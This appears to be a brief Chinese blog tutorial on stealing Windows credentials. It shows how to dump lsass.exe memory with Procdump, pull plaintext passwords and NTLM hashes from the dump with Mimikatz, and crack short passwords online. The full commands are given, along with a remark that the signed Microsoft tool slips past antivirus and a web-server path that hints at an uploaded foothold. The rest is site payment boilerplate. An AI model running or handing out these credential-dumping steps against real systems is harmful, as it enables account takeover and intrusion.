利用Procdump+Mimikatz获取Windows帐户密码

复现过程

导出lsass.exe
首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到,这里用到微软官方发布的工具Procdump导出lsass.exe,所以不存在被杀软拦截的情况:
上传文件procdump64.exe到可执行目录中,执行下面语句:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述这是路径:C:\phpStudy\PHPTutorial\WWW\lsass.dmp。
这个时候我们可以将该文件down到本地来通过mimikatz读取密码,这里一定要注意下载的lsass.dmp文件一定要和mimikatz在同一个目录下
打开本地的mimikatz执行:

"sekurlsa::minidump lsass.dmp"
"sekurlsa::logonPasswords full"

就可以直接列出账号明文密码,还有NTLM的hash,hash可以拿去网站解密下,一般情况下六位以下密码还是很容易破解出来的。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值